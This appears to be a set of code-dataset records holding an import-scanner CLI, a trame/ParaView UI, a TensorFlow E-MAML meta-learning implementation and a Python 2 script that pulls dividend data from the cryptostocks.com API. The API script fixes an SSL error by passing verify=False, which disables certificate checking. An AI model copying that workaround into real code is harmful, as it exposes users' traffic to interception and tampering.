ast.ImportFrom) -> None:\n        \"\"\"Extract imports of the form `from foo import bar`.\n\n        Relative imports such as `from ..utils import foo` will be ignored.\n\n        >>> import_statement = 'from os.path import join as jn, split'\n        >>> ast.dump(ast.parse(import_statement))\n        \"Module(body=[\n            ImportFrom(module='os.path',\n                       names=[alias(name='join', asname='jn'),\n                              alias(name='split', asname=None)],\n                       level=0)\n        ])\"\n        \"\"\"\n        # Ignore relative imports, for which node.level > 0\n        # E.g., `from ..utils import foo` has a node.level of 2\n        if node.level == 0:\n            self.imports.append(node.module)\n        self.generic_visit(node)\n\n    def get_imports(self) -> List[str]:\n        return sorted(self.imports)\n\n\ndef convert_source_to_tree(fpath: str) -> ast.Module:\n    \"\"\"Convert source code into abstract syntax tree.\n\n    Args:\n        fpath: Path to the Python file of interest\n\n    Returns:\n        AST representation of the source code\n    \"\"\"\n    with open(fpath, 'r') as f:\n        tree = ast.parse(f.read())\n    return 
tree\n\n\ndef scan_directory(dir_to_scan: str, dir_to_exclude: Optional[str] = None) -> List[str]:\n \"\"\"Extract packages imported across all Python files in a directory.\n\n Args:\n dir_to_scan: Path to the directory of interest\n dir_to_exclude: Path to the directory to be excluded during scanning\n\n Returns:\n Imported packages; might contain duplicates\n \"\"\"\n all_imports = []\n for root_dir, _, fnames in os.walk(top=dir_to_scan):\n # Skip excluded directory\n if dir_to_exclude is not None:\n if os.path.abspath(dir_to_exclude) in os.path.abspath(root_dir):\n continue\n\n for fname in fnames:\n # Skip non-Python files\n if not fname.endswith('.py'):\n continue\n\n # Convert source code into tree\n fpath = os.path.join(root_dir, fname)\n tree = convert_source_to_tree(fpath)\n\n # Extract imports for current file\n scanner = ImportScanner()\n scanner.visit(tree)\n all_imports.extend(scanner.get_imports())\n\n return all_imports\n\n\ndef get_base_name(full_name: str) -> str:\n \"\"\"Extract the base name of a package.\n\n Args:\n full_name: Full name of the package of interest, e.g., pandas.testing\n\n Returns:\n Base name of the provided package, e.g., pandas\n \"\"\"\n return full_name.split('.')[0]\n\n\ndef sort_counter(counter: Counter, alphabetical: bool) -> Dict[str, int]:\n \"\"\"Sort counter according to custom logic.\n\n Args:\n counter: Imported packages and their corresponding count\n alphabetical: Whether to sort counter alphabetically\n\n Returns:\n Sorted counter\n \"\"\"\n def custom_order(tup):\n # Sort first by count (descending), and then by name\n return -tup[1], tup[0]\n\n sort_key = None if alphabetical else custom_order\n return dict(sorted(counter.items(), key=sort_key))\n\n\ndef show_result(third_party: Dict[str, int], std_lib: Dict[str, int], ignore_std_lib: bool) -> None:\n \"\"\"Print the result of running iscan.\n\n Args:\n third_party: Imported third-party packages and count\n std_lib: Imported standard library modules and count\n ignore_std_lib: Whether to omit standard library modules in the output\n \"\"\"\n result = '''\n--------------------------\n Third-party packages\n--------------------------\nNAME COUNT\n'''\n for name, count in third_party.items():\n result += f'{name:<20} {count:>5}\\n'\n\n if not ignore_std_lib:\n result += '''\n--------------------------\n Standard library modules\n--------------------------\nNAME COUNT\n'''\n for name, count in std_lib.items():\n result += f'{name:<20} {count:>5}\\n'\n\n print(result)\n\n\ndef run(dir_to_scan: str, dir_to_exclude: Optional[str] = None) -> Tuple[Counter, Counter]:\n \"\"\"Run iscan for a given set of parameters.\n\n Args:\n dir_to_scan: Path to the directory of interest\n dir_to_exclude: Path to the directory to be excluded during scanning\n\n Returns:\n Imported third-party packages and count\n Imported standard library modules and count\n \"\"\"\n full_packages = scan_directory(dir_to_scan, dir_to_exclude)\n base_packages = map(get_base_name, full_packages)\n third_party, std_lib = separate_third_party_from_std_lib(base_packages)\n return Counter(third_party), Counter(std_lib)\n\n\ndef cli() -> argparse.Namespace:\n \"\"\"Command line interface.\"\"\"\n parser = argparse.ArgumentParser(\n allow_abbrev=False,\n description='Aggregate third-party packages and standard library modules imported across all Python files in a given directory.' 
# noqa: E501\n )\n parser.add_argument(\n 'DIR_TO_SCAN',\n help='target directory to scan'\n )\n parser.add_argument(\n '-x',\n default=None,\n dest='DIR_TO_EXCLUDE',\n help='directory to exclude during scanning'\n )\n parser.add_argument(\n '--ignore-std-lib',\n dest='IGNORE_STD_LIB',\n action='store_const',\n const=True,\n default=False,\n help='whether to leave standard library modules out of the report'\n )\n parser.add_argument(\n '--alphabetical',\n dest='ALPHABETICAL',\n action='store_const',\n const=True,\n default=False,\n help='whether to sort the report alphabetically'\n )\n return parser.parse_args()\n\n\ndef main() -> None:\n args = cli()\n third_party, std_lib = run(args.DIR_TO_SCAN, args.DIR_TO_EXCLUDE)\n third_party = sort_counter(third_party, args.ALPHABETICAL) # type: ignore\n std_lib = sort_counter(std_lib, args.ALPHABETICAL) # type: ignore\n show_result(third_party, std_lib, args.IGNORE_STD_LIB)\n","repo_name":"zzhengnan/iscan","sub_path":"iscan/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42454861","text":"from paraview import simple\n\nfrom trame.ui.vuetify import SinglePageWithDrawerLayout\nfrom trame.widgets import paraview, vuetify\n\n\ndef initialize(server):\n view = simple.GetRenderView()\n window = view.GetRenderWindow()\n\n if window:\n # Hide the render window\n window.OffScreenRenderingOn()\n\n state, ctrl = server.state, server.controller\n state.trame__title = \"Trame Tomo\"\n\n with SinglePageWithDrawerLayout(server) as layout:\n # Toolbar\n layout.title.set_text(\"Trame Tomo\")\n with layout.toolbar:\n with vuetify.VBtn(\n icon=True, click=ctrl.open_file, small=True, classes=\"mx-4\"\n ):\n vuetify.VIcon(\"mdi-folder-file-outline\")\n\n vuetify.VSpacer()\n with vuetify.VBtn(icon=True, click=ctrl.reset_camera):\n vuetify.VIcon(\"mdi-crop-free\")\n\n with layout.drawer as drawer:\n drawer.width = 400\n state.opacities = {\n 'points': [0, 0, 1, 1],\n 'gaussians': [],\n }\n with vuetify.VCard():\n with vuetify.VCardText(style='height: 400px;') as content:\n content.add_child(f\"\"\"\n \n \"\"\")\n\n # Main content\n with layout.content:\n with vuetify.VContainer(fluid=True, classes=\"pa-0 fill-height\"):\n html_view = paraview.VtkRemoteView(view, ref=\"view\")\n ctrl.reset_camera = html_view.reset_camera\n ctrl.view_update = html_view.update\n\n # Prevent selection/highlighting\n layout.root.style = \"user-select: none;\"\n","repo_name":"psavery/trame-tomo","sub_path":"trame_tomo/app/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26839045876","text":"\"\"\"stands for 'correction-MAML. Could also argue complete-maml. 
Whatever.\"\"\"\nfrom collections import Sequence\nfrom numbers import Number\nfrom typing import Any\n\nimport matplotlib\nfrom tqdm import trange\nimport tensorflow as tf\n\nfrom e_maml_tf.ge_utils import get_scope_name, stem\nfrom .config import G\nfrom e_maml_tf.algos.vpg import Inputs as VPGInputs, VPG, Optimize as VPG_Optimize\nfrom e_maml_tf.algos.ppo2 import Inputs as PPOInputs, PPO, Optimize as PPO_Optimize\nfrom e_maml_tf.algos.cpi import Inputs as CPIInputs, CPI, Optimize as CPI_Optimize\nfrom e_maml_tf.algos.bc import Inputs as BCInputs, BC, Optimize as BC_Optimize\nfrom e_maml_tf.algos.bc_learned_loss import Inputs as BCLearnedLossInputs, BCLearnedLoss\nfrom .ge_utils import defaultlist, make_with_custom_variables, GradientSum, Cache, var_map\n\nmatplotlib.use(\"Agg\")\n\nimport baselines.common.tf_util as U\nfrom .ge_policies import MlpPolicy\n\nALLOWED_ALGS = ('VPG', 'PPO', 'CPI', \"BC\", \"BCLearnedLoss\")\n\n\nclass Meta:\n optim = None\n\n def __init__(self, *, scope_name, act_space, ob_shape, algo, reuse: Any = False, trainables=None, optimizer=None,\n add_loss=None, loss_only=False, lr_rank=None, max_grad_norm=None, max_grad_clip=None,\n fix_variance=False):\n \"\"\"\n Meta Graph Constructor\n\n :param scope_name:\n :param act_space:\n :param ob_shape:\n :param algo:\n :param reuse:\n :param trainables:\n :param optimizer:\n :param lr_rank: One of [None, 0, 1, 2] corresponding to [(), 'scalar', 'simple', \"full\"] learned learning rate.\n :param max_grad_norm:\n :param max_grad_clip:\n :param fix_variance:\n \"\"\"\n assert algo in ALLOWED_ALGS, \"model algorithm need to be one of {}\".format(ALLOWED_ALGS)\n with tf.variable_scope(scope_name, reuse=reuse):\n obs = tf.placeholder(dtype=tf.float32, shape=ob_shape, name='obs') # obs\n if algo == \"PPO\":\n self.inputs = inputs = PPOInputs(action_space=act_space, value_baseline=(G.baseline == \"critic\"))\n Optimize = PPO_Optimize\n elif algo == \"VPG\":\n self.inputs = inputs = VPGInputs(action_space=act_space, value_baseline=(G.baseline == \"critic\"))\n Optimize = VPG_Optimize\n elif algo == \"CPI\":\n self.inputs = inputs = CPIInputs(action_space=act_space, value_baseline=(G.baseline == \"critic\"))\n Optimize = CPI_Optimize\n elif algo == \"BC\":\n self.inputs = inputs = BCInputs(action_space=act_space)\n Optimize = BC_Optimize\n elif algo == \"BCLearnedLoss\":\n self.inputs = inputs = BCLearnedLossInputs(action_space=act_space, type=G.learned_loss_type)\n Optimize = BC_Optimize\n else:\n raise NotImplementedError(\n 'Only supports PPO, VPG, CPI, BC and BC with Learned Loss (BCLearnedLoss)')\n inputs.X = obs # https://github.com/tianheyu927/mil/blob/master/mil.py#L218\n bias_transformation = tf.get_variable('input_bias', [1, G.bias_dim], initializer=tf.zeros_initializer())\n batch_n = tf.shape(obs)[0]\n trans_input = tf.tile(bias_transformation, [batch_n, 1])\n self.policy = policy = MlpPolicy(\n ac_space=act_space, hidden_size=G.hidden_size, n_layers=G.n_layers,\n activation=G.activation, value_baseline=(G.baseline == \"critic\"),\n reuse=reuse, X=tf.concat(values=(obs, trans_input), axis=1), X_placeholder=obs,\n init_logstd=G.init_logstd, fix_variance=fix_variance)\n\n # note that policy.trainables are the original trainable parameters, not the mocked variables.\n # todo: concatenate policy.trainable with local trainable (bias_transformation)\n self.trainables = tf.trainable_variables() if trainables is None else trainables\n\n ext_loss = add_loss(inputs.ADV) if callable(add_loss) else None\n if algo == \"PPO\":\n 
self.model = PPO(inputs=inputs, policy=policy, vf_coef=G.vf_coef, ent_coef=G.ent_coef)\n elif algo == \"VPG\":\n self.model = VPG(inputs=inputs, policy=policy, vf_coef=G.vf_coef)\n elif algo == \"CPI\":\n self.model = CPI(inputs=inputs, policy=policy, vf_coef=G.vf_coef, ent_coef=G.ent_coef)\n elif algo == \"BC\":\n self.model = BC(inputs=inputs, policy=policy)\n elif algo == \"BCLearnedLoss\":\n self.model = BCLearnedLoss(inputs=inputs, policy=policy, type=G.learned_loss_type)\n\n self.loss = self.model.loss if ext_loss is None else (self.model.loss + ext_loss)\n\n if not loss_only:\n if lr_rank == 0:\n inputs.LR = lr = tf.placeholder(tf.float32, shape=[], name=\"LR\")\n elif lr_rank == 1:\n inputs.LR = lr = tf.placeholder(tf.float32, shape=(len(self.trainables),), name=\"LR\")\n elif lr_rank == 2:\n inputs.LR = lr = [tf.placeholder(tf.float32, shape=t.shape, name=f\"LR_{stem(t, 2)}\")\n for t in self.trainables]\n elif lr_rank is None:\n lr = None\n else:\n raise NotImplementedError(f\"lr_rank = {lr_rank} is not supported. Check for programming error.\")\n self.optim = Optimize(lr=lr, loss=self.loss, reports=self.model.reports,\n trainables=self.trainables, max_grad_norm=max_grad_norm,\n max_grad_clip=max_grad_clip, optimizer=optimizer)\n\n\ndef _mean(x, axis=None, keepdims=False):\n return tf.reduce_mean(x, reduction_indices=None if axis is None else [axis], keep_dims=keepdims)\n\n\ndef cmaml_loss(neglogpacs, advantage):\n mean_adv = _mean(advantage)\n # we attribute adv to all workers in the style of DICE\n exploration_term = _mean(neglogpacs) * mean_adv\n return exploration_term * G.e_maml_lambda\n\n\nclass SingleTask:\n def __init__(self, act_space, ob_shape, trainable_map, meta_trainable_map=None, lr=None):\n # no need to go beyond despite of large G.eval_grad_steps, b/c RL samples using runner policy.\n\n if meta_trainable_map is None:\n meta_trainable_map = trainable_map\n\n self.workers = defaultlist(None)\n self.metas = defaultlist(None)\n\n params = defaultlist(None)\n params[0] = meta_trainable_map.copy()\n params[0].update(trainable_map)\n\n import gym\n assert type(act_space) is gym.spaces.Box\n act_dim, *_ = act_space.shape\n\n for k in range(G.n_grad_steps + 1):\n if k < G.n_grad_steps: # 0 - 9,\n\n self.workers[k] = worker = make_with_custom_variables(\n lambda: Meta(scope_name=f'inner_{k}_grad_network',\n act_space=act_space, ob_shape=ob_shape, algo=G.inner_alg,\n # do NOT pass in learning rate to inhibit the Meta.optimize operator.\n optimizer=G.inner_optimizer, reuse=True, trainables=list(params[k].values()),\n max_grad_norm=G.inner_max_grad_norm, max_grad_clip=G.inner_max_grad_clip,\n fix_variance=True\n ), # pass in the trainable_map for proper gradient\n params[k], f'{get_scope_name()}/inner_{k}_grad_network/'\n )\n\n with tf.variable_scope(f'SGD_grad_{k}'):\n if (isinstance(lr, Sequence) and len(lr)) or (hasattr(lr, 'shape') and len(lr.shape)):\n learn_rates = lr[k]\n else:\n worker.inputs.LR = lr # this is important because this is needed by the feed_dict\n learn_rates = [lr] * len(worker.optim.grads)\n params[k + 1] = meta_trainable_map.copy()\n if G.first_order:\n params[k + 1].update({k: worker.optim.apply_grad(lr=lr, grad=tf.stop_gradient(g), var=v)\n for g, lr, (k, v) in\n zip(learn_rates, worker.optim.grads, params[k].items())})\n else:\n params[k + 1].update({k: worker.optim.apply_grad(lr=lr, grad=g, var=v)\n for g, lr, (k, v) in\n zip(learn_rates, worker.optim.grads, params[k].items())})\n\n if k == G.n_grad_steps: # 10 or 1.\n add_loss = None if G.run_mode 
!= 'e-maml' \\\n else lambda ADV: cmaml_loss([w.model.neglogpac for w in self.workers], ADV)\n self.meta = make_with_custom_variables(\n lambda: Meta(scope_name=\"meta_network\", act_space=act_space, ob_shape=ob_shape,\n algo=G.meta_alg, reuse=True, add_loss=add_loss, loss_only=True, )\n , params[k], f'{get_scope_name()}/meta_network/'\n )\n\n # Expose as non-public API for debugging purposes\n self._params = params\n\n\ndef assert_match(l1, l2):\n assert len(l1) > 0\n for i, (a, b) in enumerate(zip(l1, l2)):\n assert a == b, \"existing items has to be the same.\"\n return l1[i + 1:] if len(l1) > len(l2) else l2[i + 1:]\n\n\n# Algorithm Summary\n# 1. [sample] with pi(theta) `run_episode`\n# 2. compute policy gradient (vanilla)\n# 3. apply gradient to get \\theta' using SGD\n# 4. [sample] with pi(theta') `run_episode`\n# 5. use PPO, compute meta gradient\n# 6. sum up the PPO gradient from multiple tasks and average\n# 6. apply this gradient\nclass E_MAML:\n gradient_sum = None\n alpha = None\n\n def __init__(self, ob_space, act_space):\n \"\"\"\n Usage:\n self.env = env\n ob_shape = (None,) + self.env.observation_space.shape\n \"\"\"\n from ml_logger import logger\n logger.upload_file(__file__)\n\n ob_shape = (None,) + ob_space.shape\n\n import gym\n assert type(act_space) is gym.spaces.Box\n act_dim, *_ = act_space.shape\n\n if G.meta_sgd == 'full':\n lr_rank = 2\n elif G.meta_sgd:\n lr_rank = 1\n else:\n lr_rank = 0\n # Meta holds policy, inner optimizer. Also creates an input.LR placeholder.\n self.runner = Meta(scope_name='runner', act_space=act_space, ob_shape=ob_shape, algo=G.inner_alg,\n lr_rank=lr_rank, optimizer=G.inner_optimizer, max_grad_norm=G.inner_max_grad_norm,\n max_grad_clip=G.inner_max_grad_clip, fix_variance=G.control_variance)\n\n trainables = self.runner.trainables\n runner_var_map = var_map(trainables, 'runner/')\n # note: the point of AUTO_REUSE is:\n # note: if reuse=True, gives error when no prior is available. Otherwise always creates new.\n # note: This yaw, only creates new when old is not available.\n self.meta_runner = Meta(scope_name=\"runner\", act_space=act_space, ob_shape=ob_shape, algo=G.meta_alg,\n reuse=tf.AUTO_REUSE, loss_only=True, fix_variance=G.fix_meta_variance)\n meta_trainables = self.meta_runner.trainables\n meta_runner_var_map = var_map(meta_trainables, 'runner/')\n # meta_trainables = assert_match(trainables, meta_trainables)\n\n self.beta = tf.placeholder(tf.float32, [], name=\"beta\")\n\n print(\">>>>>>>>>>> Constructing Meta Graph <<<<<<<<<<<\")\n # todo: we can do multi-GPU placement of the graph here.\n self.graphs = []\n assert G.n_graphs == 1 or G.n_graphs == G.n_tasks, \"graph number is 1 or equal to the number of tasks\"\n\n if G.meta_sgd:\n assert isinstance(G.alpha, Number), \"alpha need to be a scalar.\"\n self.alpha = [] # has to be per-layer per-block. 
Bias and weights require different scales.\n            for k in range(G.n_grad_steps):\n                with tf.variable_scope(f'learned_alpha_{k}'):\n                    self.alpha.append([\n                        tf.get_variable(f'alpha_{stem(t.name, 2)}', shape=t.shape if G.meta_sgd == \"full\" else (),\n                                        initializer=tf.constant_initializer(G.alpha))\n                        for t in trainables\n                    ])\n        else:\n            self.alpha = self.runner.inputs.LR\n        for t in trange(G.n_graphs):\n            with tf.variable_scope(f\"graph_{t}\"):\n                # note: should use different learning rate for each gradient step\n                task_graph = SingleTask(act_space=act_space, ob_shape=ob_shape, trainable_map=runner_var_map,\n                                        meta_trainable_map=meta_runner_var_map, lr=self.alpha)\n                self.graphs.append(task_graph)\n\n        all_trainables = tf.trainable_variables()  # might be controlled variables in the meta loop\n\n        # Only do this after the meta graph has finished using policy.trainables\n        # Note: stateful operators for saving to a cache and loading from it. Only used to reset runner\n        # Note: Slots are not supported. Only weights.\n        # fixit: all_variables might not be needed. Only that of the runner need to be cached.\n        with tf.variable_scope(\"weight_cache\"):\n            self.cache = Cache(all_trainables)\n            self.save_weight_cache = U.function([], [self.cache.save])\n            self.load_weight_cache = U.function([], [self.cache.load])\n\n        # Now construct the meta optimizers\n        with tf.variable_scope('meta_optimizer'):\n            # call gradient_sum.set_op first, then add_op. Call k times in-total.\n            self.meta_grads = tf.gradients(tf.reduce_mean([task_graph.meta.loss for task_graph in self.graphs]),\n                                           all_trainables)\n            if G.n_graphs == 1:\n                self.gradient_sum = GradientSum(all_trainables, self.meta_grads)\n                grads = [c / G.n_tasks for c in self.gradient_sum.cache]\n            else:\n                grads = self.meta_grads\n\n            if G.meta_max_grad_norm:  # allow 0 to be by-pass\n                grads = [None if g is None else\n                         g * tf.stop_gradient(G.meta_max_grad_norm / tf.maximum(G.meta_max_grad_norm, tf.norm(g)))\n                         for g in grads]\n\n            # do NOT apply gradient norm here.\n            if G.meta_optimizer == \"Adam\":\n                Optim, kwargs = tf.train.AdamOptimizer, {}\n            elif G.meta_optimizer == \"AdamW\":\n                Optim, kwargs = tf.contrib.opt.AdamWOptimizer, dict(weight_decay=0.0001)\n            elif G.meta_optimizer == \"SGD\":\n                Optim, kwargs = tf.train.GradientDescentOptimizer, {}\n            else:\n                raise NotImplementedError(f\"{G.meta_optimizer} as a meta optimizer is not implemented.\")\n\n            # Uses a different optimizer (with slots) for each step in the meta update.\n            self.meta_update_ops = defaultlist(None)\n            self.meta_optimizers = defaultlist(None)\n            for i in range(1 if G.reuse_meta_optimizer else G.meta_n_grad_steps):\n                self.meta_optimizers[i] = Optim(learning_rate=self.beta, **kwargs)\n                self.meta_update_ops[i] = self.meta_optimizers[i].apply_gradients(zip(grads, all_trainables))\n\n        self.meta_reporting_keys = self.graphs[0].meta.model.reports.keys()\n        self.meta_reporting = self.graphs[0].meta.model.reports.values() if G.n_graphs == 1 else \\\n            [tf.reduce_mean(_) for _ in zip(*[graph.meta.model.reports.values() for graph in self.graphs])]\n","repo_name":"geyang/e-maml","sub_path":"e_maml_tf/e_maml_ge.py","file_name":"e_maml_ge.py","file_ext":"py","file_size_in_byte":15839,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"70780173288","text":"import os\nimport argparse\n#import urllib2\nfrom urlparse import urljoin\nimport requests\n\nimport json\nimport pandas as pd\nimport numpy as np\n#import dateutil.parser\nimport datetime\nimport pytz\n\nclass API_Request:\n    def 
__init__(self, base_path, api_url, values={}, api_type='json', flag_download=True):\n self.flag_download = flag_download\n \n self.api_type = api_type\n \n self.api_url = api_url\n self.short_filename = api_url #.replace('/','_')\n\n self.values = values\n \n self.base_path = base_path \n \n self.api_base_url = \"https://cryptostocks.com/api/\"\n\n def update(self):\n self.get_data()\n self.convert_to_DataFrame()\n self.calculate()\n\n def get_data(self):\n self.filename = os.path.join(self.base_path, \"data_in/{api_url}{dict_val}.{api_type}\".format(api_url=self.short_filename, dict_val=self.dict2str(self.values) ,api_type=self.api_type))\n\n if self.flag_download:\n self.download()\n self.write_data()\n else:\n self.read_data()\n\n def download(self):\n self.url = urljoin(self.api_base_url, self.api_url)\n self.url = self.url + '.' + self.api_type\n print(\"Downloading {api_url} from {url} (please wait)\".format(api_url=self.api_url, url=self.url))\n print(\" parameters= {d}\".format(d=self.values))\n \n #req = requests.get(self.url, params=self.values)\n req = requests.get(self.url, params=self.values, verify=False)\n # to fix requests.exceptions.SSLError: [Errno 1] _ssl.c:504: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed\n \n self.raw_data = req.content\n \n if self.api_type=='json':\n self.data = json.loads(self.raw_data)\n else:\n raise(Exception(\"Undefined API type\"))\n \n def write_data(self):\n print(\"Writing {api_url} to {filename}\".format(api_url=self.api_url, filename=self.filename))\n myFile = open(self.filename, 'w')\n myFile.write(self.raw_data)\n myFile.close()\n\n def read_data(self):\n print(\"Reading {api_url} from {filename}\".format(api_url=self.api_url, filename=self.filename))\n myFile = open(self.filename, 'r')\n self.raw_data = myFile.read()\n self.data = json.loads(self.raw_data)\n myFile.close()\n\n def dict2str(self, d):\n str = ''\n for (key, value) in d.iteritems():\n #str = str + '_' + key + '-' + value\n str = str + '-' + key + '_' + value\n return(str)\n\n def pretty_print(self):\n if self.api_type=='json':\n print(json.dumps(self.data, sort_keys=True, indent=2))\n else:\n raise(Exception(\"Undefined API type\"))\n\n def convert_to_DataFrame(self):\n pass\n\n def calculate(self):\n pass\n\n def to_excel(self):\n filename = os.path.join(self.base_path, \"data_out/{api_url}{dict_val}.xls\".format(api_url=self.short_filename, dict_val=self.dict2str(self.values)))\n self.df.to_excel(filename)\n\nclass API_Request_get_security_info(API_Request):\n def __init__(self, base_path, ticker, api_type='json', flag_download=True):\n api_url = 'get_security_info'\n values = {'ticker': ticker}\n \n API_Request.__init__(self, args.basepath, api_url, values, api_type='json', flag_download=flag_download)\n\nclass API_Request_get_dividend_for_security(API_Request):\n def __init__(self, base_path, ticker, days=30, daysoffset=0, api_type='json', flag_download=True):\n api_url = 'get_dividend_for_security'\n #values = {'ticker': ticker, 'days': str(days)}\n values = {'ticker': ticker, 'after_id': str(-1)} # to get all dividend\n\n self.ticker = ticker\n self.days = days\n self.daysoffset = daysoffset\n \n API_Request.__init__(self, args.basepath, api_url, values, api_type='json', flag_download=flag_download)\n\n def convert_to_DataFrame(self):\n if self.data['return_code']==0:\n try:\n if len(self.data['dividends'])>0:\n self.df = pd.DataFrame(self.data['dividends'])\n else:\n self.df = pd.DataFrame(columns=['dividend_per_share', 'id', 
'number_shares', 'timestamp'])\n except:\n raise(Exception(\"Can't convert get_dividend to DataFrame\"))\n else:\n raise(Exception(\"return_code!=0\"))\n\n # convert unicode to float\n self.df['dividend_per_share'] = self.df['dividend_per_share'].astype(float)\n \n #self.df['timestamp'] = self.df['timestamp'].map(lambda s: dateutil.parser.parse(s))\n #self.df['timestamp'] = self.df['timestamp'].map(lambda s: datetime.datetime.fromtimestamp(int(s), tz=pytz.UTC)) #convert timestamp to datetime\n self.df['timestamp'] = pd.to_datetime(self.df['timestamp'])\n\n # filter to keep only dividend from now - daysoffset to now - days - daysoffset\n #dtnow = datetime.datetime.now().replace(tzinfo=pytz.UTC)\n dtnow = datetime.datetime.utcnow()\n dt2 = dtnow - datetime.timedelta(days=self.daysoffset)\n dt1 = dt2 - datetime.timedelta(days=self.days)\n print(\"dividends from {dt1} to {dt2}\".format(dt1=dt1, dt2=dt2))\n self.df = self.df[(self.df['timestamp']>=dt1) & (self.df['timestamp']<=dt2)]\n\n def calculate(self):\n self.df['total_dividend'] = self.df['dividend_per_share'] * self.df['number_shares']\n #self.df['dividend_per_share'] = self.df['total_dividend']/self.df['number_shares']\n\n self.dividend_per_share_total = float(self.df['dividend_per_share'].sum())\n self.number_shares_total = float(self.df['number_shares'].sum())\n self.total_dividend_total = self.df['total_dividend'].sum()\n if self.number_shares_total!=0:\n self.dividend_per_share_avg = self.total_dividend_total/self.number_shares_total\n else:\n self.dividend_per_share_avg = 0.0 # None\n\n self.dividends_nb = len(self.df)\n\nclass API_Request_get_list_of_securities(API_Request):\n def __init__(self, base_path, api_type='json', flag_download=True):\n api_url = 'get_list_of_securities'\n \n #values = {'currency': 'BTC'}\n values = {} # all currencies\n \n API_Request.__init__(self, base_path, api_url, values, api_type, flag_download=flag_download)\n \n self.update()\n \n self.convert_to_DataFrame()\n \n #print(self.df)\n self.df.index = self.df['ticker'] # use ticker as index\n #self.df = self.df.set_index(self.df['ticker'])\n \n #['ticker', 'name', 'currency', 'number_public_shares', 'highest_bid', 'lowest_ask', 'last_price', 'volume_24h', 'volume_7d', 'volume_30d']\n self.df['lowest_ask'] = np.nan\n self.df['highest_bid'] = np.nan\n \n self.df['dividend_per_share'] = np.nan\n self.df['dividends_nb'] = 0\n \n if args.days!=None:\n days = int(args.days)\n else:\n days = 30\n\n if args.daysoffset!=None:\n daysoffset = int(args.daysoffset)\n else:\n daysoffset = 0\n \n for ticker in self.tickers():\n print(\"=\"*10 + \" \" + ticker + \" \" + \"=\"*10)\n \n security_info = API_Request_get_security_info(base_path, ticker, api_type, flag_download)\n security_info.update()\n \n #print(\"=\"*10 + \" \" + ticker + \" (\" + security_info.data['currency'] + \") \" + \" \" + \"=\"*10)\n \n print(\"currency: {currency}\".format(currency=security_info.data['currency']))\n #print(\"name: {name}\".format(name=security_info.data['name'])) # ToFix: \n \n #print(\"{name} ({currency})\".format(\n # name = security_info.data['name'],\n # currency = security_info.data['currency']\n #))\n \n try:\n lowest_ask = float(security_info.data['lowest_ask'])\n except:\n lowest_ask = None\n #print(\"lowest_ask={val}\".format(val=lowest_ask))\n self.df['lowest_ask'][ticker] = lowest_ask\n\n try:\n highest_bid = float(security_info.data['highest_bid'])\n except:\n highest_bid = None\n #print(\"highest_bid={val}\".format(val=highest_bid))\n 
self.df['highest_bid'][ticker] = highest_bid\n \n print(\"\")\n \n dividend_for_security = API_Request_get_dividend_for_security(base_path, ticker, days, daysoffset, api_type, flag_download)\n dividend_for_security.update()\n print(dividend_for_security.df)\n #dividend_for_security.to_excel()\n print('')\n print(\"dividend_per_share_total={dividend_per_share_total}\".format(dividend_per_share_total=dividend_for_security.dividend_per_share_total))\n print(\"dividend_per_share_avg={dividend_per_share_avg}\".format(dividend_per_share_avg=dividend_for_security.dividend_per_share_avg))\n #print(\"dividend_per_share={val}\".format(val=dividend_per_share))\n self.df['dividend_per_share'][ticker] = dividend_for_security.dividend_per_share_total\n self.df['dividends_nb'][ticker] = dividend_for_security.dividends_nb\n \n print(\"\")\n\n print(\"\")\n print(\"=\"*15 + \" \" + \"SUMMARY\" + \" \" + \"=\"*15)\n\n self.df = self.df.rename(columns={\n 'lowest_ask': 'ask',\n 'highest_bid': 'bid'\n })\n \n #print(self.df)\n \n # Calculate\n self.df['SpreadRelPC'] = 200.0 * (self.df['ask'] - self.df['bid']) / (self.df['ask'] + self.df['bid'])\n \n self.df['DividendPerPricePC'] = self.df['dividend_per_share']/self.df['ask'] * 100.0\n self.df['DividendPerPricePC'] = self.df['DividendPerPricePC'].fillna(0.0)\n\n # URL\n #self.df['url'] = self.df.index\n #self.df['url'] = 'https://cryptostocks.com/securities/' + self.df['url']\n \n # Filter\n if args.currency!=None:\n self.df = self.df[self.df['currency']==args.currency]\n\n if args.onlywithdividend:\n self.df = self.df[self.df['dividend_per_share']>0]\n\n if args.onlywithask:\n self.df = self.df[self.df['ask']>0]\n\n if args.maxspreadrel != None:\n self.df = self.df[self.df['SpreadRelPC'] <= float(args.maxspreadrel)]\n \n # Sort\n self.df = self.df.sort('DividendPerPricePC', ascending=True)\n \n df = self.df[['name', 'currency', 'ask', 'bid', 'dividends_nb', 'dividend_per_share', 'SpreadRelPC', 'DividendPerPricePC']]\n print(df)\n \n filename = os.path.join(self.base_path, \"data_out/data.xls\")\n self.df.to_excel(filename)\n \n\n #filename = os.path.join(self.base_path, \"data_out/data_{days}.csv\".format(days=days))\n #self.df.to_csv(filename)\n #filename = os.path.join(self.base_path, \"data_out/data_{days}.xls\".format(days=days))\n #self.df.to_excel(filename)\n\n def convert_to_DataFrame(self):\n if self.data['return_code']==0:\n try:\n self.df = pd.DataFrame(self.data['securities'])\n except:\n raise(Exception(\"Can't convert to DataFrame\"))\n \n else:\n raise(Exception(\"return_code!=0\"))\n\n def tickers(self):\n for ticker in self.df['ticker']:\n yield ticker\n\nclass CryptoStocksFilter:\n def __init__(self, args): \n self.args = args\n \n flag_download = not self.args.nodownload\n api_req = API_Request_get_list_of_securities(args.basepath, api_type='json', flag_download=flag_download)\n api_req.to_excel()\n \n if args.printraw:\n api_req.pretty_print()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Use the following parameters')\n parser.add_argument('--nodownload', action=\"store_true\", help=\"use this flag to avoid downloading orderbook (will use a previously downloaded file)\")\n parser.add_argument('--printraw', action=\"store_true\", help=\"use this flag to pretty print raw data\")\n #parser.add_argument('--printsecu', action=\"store_true\", help=\"use this flag to print securities\")\n parser.add_argument('--onlywithdividend', action=\"store_true\", help=\"use this flag to filter securities that send 
